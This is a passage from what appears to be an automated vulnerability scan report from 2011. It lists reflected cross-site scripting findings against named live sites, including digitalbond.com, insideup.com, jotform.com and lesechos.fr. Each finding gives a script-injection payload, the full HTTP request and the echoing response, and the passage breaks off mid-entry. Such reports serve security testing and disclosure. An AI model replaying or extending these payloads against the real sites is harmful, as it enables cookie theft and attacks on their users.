Vary: User-Agent,Accept-Encoding
Content-Length: 41773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content68e96\"><script>alert(1)</script>5199d6c8bfe/plugins/oiopub-direct/modules/tracker/tracker.php?pids=0|8&amp;_login=6892fa8b99">
...[SNIP]...

3.155. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.digitalbond.com
Path:   /wp-content/plugins/oiopub-direct/modules/tracker/tracker.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56cc7"><script>alert(1)</script>6a526b333db was submitted in the REST URL parameter 2. This input was echoed as 56cc7\"><script>alert(1)</script>6a526b333db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins56cc7"><script>alert(1)</script>6a526b333db/oiopub-direct/modules/tracker/tracker.php?pids=0|8 HTTP/1.1
Host: www.digitalbond.com
Proxy-Connection: keep-alive
Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 20 Apr 2011 14:07:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=f8c454021d68345fd62765bf46a8ee7a; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Wed, 20 Apr 2011 14:07:03 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 41765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins56cc7\"><script>alert(1)</script>6a526b333db/oiopub-direct/modules/tracker/tracker.php?pids=0|8&amp;_login=5af75a7949">
...[SNIP]...

3.156. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.digitalbond.com
Path:   /wp-content/plugins/oiopub-direct/modules/tracker/tracker.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2c6e"><script>alert(1)</script>2bc8a2eddd7 was submitted in the REST URL parameter 3. This input was echoed as f2c6e\"><script>alert(1)</script>2bc8a2eddd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/oiopub-directf2c6e"><script>alert(1)</script>2bc8a2eddd7/modules/tracker/tracker.php?pids=0|8 HTTP/1.1
Host: www.digitalbond.com
Proxy-Connection: keep-alive
Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 20 Apr 2011 14:07:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=dbe15cc4253099f8b0529f9d8c74f9d4; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Wed, 20 Apr 2011 14:07:26 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 41716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins/oiopub-directf2c6e\"><script>alert(1)</script>2bc8a2eddd7/modules/tracker/tracker.php?pids=0|8&amp;_login=be8fe6c673">
...[SNIP]...

3.157. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.digitalbond.com
Path:   /wp-content/plugins/oiopub-direct/modules/tracker/tracker.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c8c"><script>alert(1)</script>4a58cf6c2e9 was submitted in the REST URL parameter 4. This input was echoed as 99c8c\"><script>alert(1)</script>4a58cf6c2e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/oiopub-direct/modules99c8c"><script>alert(1)</script>4a58cf6c2e9/tracker/tracker.php?pids=0|8 HTTP/1.1
Host: www.digitalbond.com
Proxy-Connection: keep-alive
Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 20 Apr 2011 14:07:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=8d2bd12bf95549b699bed6b5601f5168; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Wed, 20 Apr 2011 14:07:49 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 41744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules99c8c\"><script>alert(1)</script>4a58cf6c2e9/tracker/tracker.php?pids=0|8&amp;_login=b1c54cde55">
...[SNIP]...

3.158. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.digitalbond.com
Path:   /wp-content/plugins/oiopub-direct/modules/tracker/tracker.php

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6ba5"><script>alert(1)</script>5b5a6145b4a was submitted in the REST URL parameter 5. This input was echoed as a6ba5\"><script>alert(1)</script>5b5a6145b4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/oiopub-direct/modules/trackera6ba5"><script>alert(1)</script>5b5a6145b4a/tracker.php?pids=0|8 HTTP/1.1
Host: www.digitalbond.com
Proxy-Connection: keep-alive
Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 20 Apr 2011 14:08:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=23f10697ffc65b3d420c75e9a4c97310; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Wed, 20 Apr 2011 14:08:14 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 41743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/trackera6ba5\"><script>alert(1)</script>5b5a6145b4a/tracker.php?pids=0|8&amp;_login=4dc9f75bb2">
...[SNIP]...

3.159. http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.php [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.digitalbond.com
Path:   /wp-content/plugins/oiopub-direct/modules/tracker/tracker.php

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6255"><script>alert(1)</script>471cc409191 was submitted in the REST URL parameter 6. This input was echoed as e6255\"><script>alert(1)</script>471cc409191 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/oiopub-direct/modules/tracker/tracker.phpe6255"><script>alert(1)</script>471cc409191?pids=0|8 HTTP/1.1
Host: www.digitalbond.com
Proxy-Connection: keep-alive
Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=132820251.1303242944.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-28442329-1303242943838; __utma=132820251.1442382144.1303242944.1303242944.1303242944.1; _chartbeat2=2qvt6nq9losv9f64

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 20 Apr 2011 14:08:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=1bfca54f3965cf02e03cbb2f6e073483; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Wed, 20 Apr 2011 14:08:36 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 41765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/tracker.phpe6255\"><script>alert(1)</script>471cc409191?pids=0|8&amp;_login=b79f26fabe">
...[SNIP]...

3.160. http://www.insideup.com/forgotPassword.html [username parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /forgotPassword.html

Issue detail

The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af64a"><script>alert(1)</script>a0e25d7d8ae was submitted in the username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /forgotPassword.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=6BEF346987D68A3E238C3C14837EFF90
Accept-Encoding: gzip, deflate
Content-Length: 22

userchoice=1&username=af64a"><script>alert(1)</script>a0e25d7d8ae

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:15:52 GMT
Server: Apache/2.2.9 (Fedora)
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 2126
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<form id="forgotPasswordForm" method="post" style="margin:0;">
<div id="popUpMain">
   <div id="popUpTop">
   <div id="popUpTitle" class="commBlackTxt">Forgot Password</div>
<div id="popCl
...[SNIP]...
<input name="username" type="text" id="userNameBox" class="comm_input formError" value="af64a"><script>alert(1)</script>a0e25d7d8ae" onkeypress="onEnterKeyPress(event)" style="width:180px;">
...[SNIP]...

3.161. http://www.insideup.com/login.html [password parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /login.html

Issue detail

The value of the password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ea01"><script>alert(1)</script>c5404c339c7 was submitted in the password parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /login.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=6BEF346987D68A3E238C3C14837EFF90
Accept-Encoding: gzip, deflate
Content-Length: 60

refererUrl=&username=username&password=password6ea01"><script>alert(1)</script>c5404c339c7&_rememberme=

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:15:52 GMT
Server: Apache/2.2.9 (Fedora)
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 2632
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<script language="javascript">
function clearInput(e){
if(e.value=='username'||e.value=='password')
{e.value="";
}
}

</script>


                        <form id="loginForm" method="post">

...[SNIP]...
<input style="border:1px solid #CCCCCC;height:23px;width:110px;" name="password" type="password" value="password6ea01"><script>alert(1)</script>c5404c339c7" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" />
...[SNIP]...

3.162. http://www.insideup.com/login.html [username parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /login.html

Issue detail

The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e687"><script>alert(1)</script>67e9ee1a59a was submitted in the username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /login.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=6BEF346987D68A3E238C3C14837EFF90
Accept-Encoding: gzip, deflate
Content-Length: 60

refererUrl=&username=username3e687"><script>alert(1)</script>67e9ee1a59a&password=password&_rememberme=

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:15:46 GMT
Server: Apache/2.2.9 (Fedora)
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 2639
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<script language="javascript">
function clearInput(e){
if(e.value=='username'||e.value=='password')
{e.value="";
}
}

</script>


                        <form id="loginForm" method="post">

...[SNIP]...
<input style="border:1px solid #CCCCCC;height:23px;width:110px;" name="username" type="text" value="username3e687"><script>alert(1)</script>67e9ee1a59a" onfocus="clearInput(this);" class='formError' onkeypress="checkEnterKey(event)" tabindex="1"/>
...[SNIP]...

3.163. http://www.insideup.com/updateCity.html [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /updateCity.html

Issue detail

The value of the city request parameter is copied into the HTML document as plain text between tags. The payload eb7a1<script>alert(1)</script>1db7d40c8bd was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /updateCity.html?city=Albuquerqueeb7a1<script>alert(1)</script>1db7d40c8bd HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: */*
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=6BEF346987D68A3E238C3C14837EFF90
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:15:36 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 58
Connection: close
Content-Type: text/html; charset=UTF-8

Albuquerqueeb7a1<script>alert(1)</script>1db7d40c8bd/null/

3.164. http://www.insideup.com/wiki/index.php [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /wiki/index.php

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eac1"><script>alert(1)</script>bf0484e3881 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wiki/index.php?title=-&action=raw5eac1"><script>alert(1)</script>bf0484e3881&gen=js&useskin=monobook HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.insideup.com
Cookie: OAID=5970e1167121a2363c810f601c8e5f51; PHPSESSID=7o85u69j279gjuu7r5rl5e0lu6

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:44:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Cookie;string-contains=insideupwiki_up_UserID;string-contains=insideupwiki_up__session,Accept-Encoding;list-contains=gzip
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
...[SNIP]...
<img style="display:none;" src="http://www.insideup.com/images/spacer.gif" onload="trackingPageContent('Sub Category Page','','index.php?title=-&action=raw5eac1"><script>alert(1)</script>bf0484e3881&gen=js&useskin=monobook')" />
...[SNIP]...

3.165. http://www.insideup.com/wiki/index.php [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /wiki/index.php

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8809</script><script>alert(1)</script>18e974c6791 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wiki/index.php?title=-&action=rawd8809</script><script>alert(1)</script>18e974c6791&gen=js&useskin=monobook HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.insideup.com
Cookie: OAID=5970e1167121a2363c810f601c8e5f51; PHPSESSID=7o85u69j279gjuu7r5rl5e0lu6

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:45:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Cookie;string-contains=insideupwiki_up_UserID;string-contains=insideupwiki_up__session,Accept-Encoding;list-contains=gzip
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
...[SNIP]...
e="text/javascript">
                            var subCategoryArrayID;
                                function subId()
                                {
                                $.ajax({'type': 'GET', 'url': '../getsubCategoryNameToId.html?name=index.php?title=-&action=rawd8809</script><script>alert(1)</script>18e974c6791&gen=js&useskin=monobook',async:false,success: function(data){subCategoryArrayID=data.split(",");}});
                                }
                                subId();
        AC_FL_RunContent( 'codebase','http://down
...[SNIP]...

3.166. http://www.jotform.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jotform.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1deb9<script>alert(1)</script>a999c03644a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico1deb9<script>alert(1)</script>a999c03644a HTTP/1.1
Host: www.jotform.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.32
Date: Tue, 19 Apr 2011 20:01:53 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny9
Status: 404 Not Found
Vary: Accept-Encoding
Content-Length: 251

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL "favicon.ico1deb9<script>alert(1)</script>a999c03644a" was not found on this server.</p>
...[SNIP]...

3.167. http://www.jotform.com/form/2910946098 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jotform.com
Path:   /form/2910946098

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3eb97<script>alert(1)</script>b8575cf51d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /form3eb97<script>alert(1)</script>b8575cf51d4/2910946098 HTTP/1.1
Host: www.jotform.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.32
Date: Tue, 19 Apr 2011 19:47:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Status: 404 Not Found
Vary: Accept-Encoding
Content-Length: 255

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL "form3eb97<script>alert(1)</script>b8575cf51d4/2910946098" was not found on this server.</p>
...[SNIP]...

3.168. http://www.lesechos.fr/investisseurs/actualites-boursieres/0201292688069-soupcons-d-espionnage-chez-safran.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lesechos.fr
Path:   /investisseurs/actualites-boursieres/0201292688069-soupcons-d-espionnage-chez-safran.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c7d"><a>500034c1e00 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /investisseurs/actualites-boursieres/0201292688069-soupcons-d-espionnage-chez-safran.htmf3c7d"><a>500034c1e00 HTTP/1.1
Host: www.lesechos.fr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 19:47:32 GMT
Server: Apache/1.3.37 (Unix) PHP/5.1.6
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 94486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr" xmlns:fb=
...[SNIP]...
<a
data-via="LesEchos"
data-related="LesEchos"
data-count="horizontal"
data-counturl="http://www.lesechos.fr/investisseurs/actualites-boursieres/0201292688069-soupcons-d-espionnage-chez-safran.htmf3c7d"><a>500034c1e00"
data-text="Soup&ccedil;ons d'espionnage chez Safran    "
data-lang="fr"
data-url="http://lesechos.fr/0201292688069.htm"
href="http://twitter.com/share" class="twitter-share-button">
...[SNIP]...

3.169. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

